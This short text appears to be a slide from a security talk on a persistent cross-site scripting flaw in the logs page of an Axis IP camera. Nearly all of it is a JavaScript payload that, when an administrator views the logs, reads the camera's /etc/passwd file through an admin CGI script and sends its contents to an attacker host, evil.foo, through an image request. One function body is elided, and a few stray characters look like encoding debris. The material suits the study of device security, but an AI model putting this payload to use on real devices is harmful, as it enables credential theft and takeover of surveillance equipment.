Owning big brother: persistent XSS on logs page on Axis IP camera
çSteal passwd when admin checks logs
¼// xhrmagic.js . steals Axis 2100 passwd file
// (needs to be used in XSS attack to make it work)

var req;
var url="/admin-bin/editcgi.cgi?file=/etc/passwd";

function loadXMLDoc(url) { [snip] }

function processReqChange() {
// only if req shows "loaded"
if (req.readyState == 4) {
// only if "OK"
if (req.status == 200) {
// send to attacker
C=new Image();
C.src="http://evil.foo/chivato.php?target="+req.responseText;
}
}
} loadXMLDoc(url);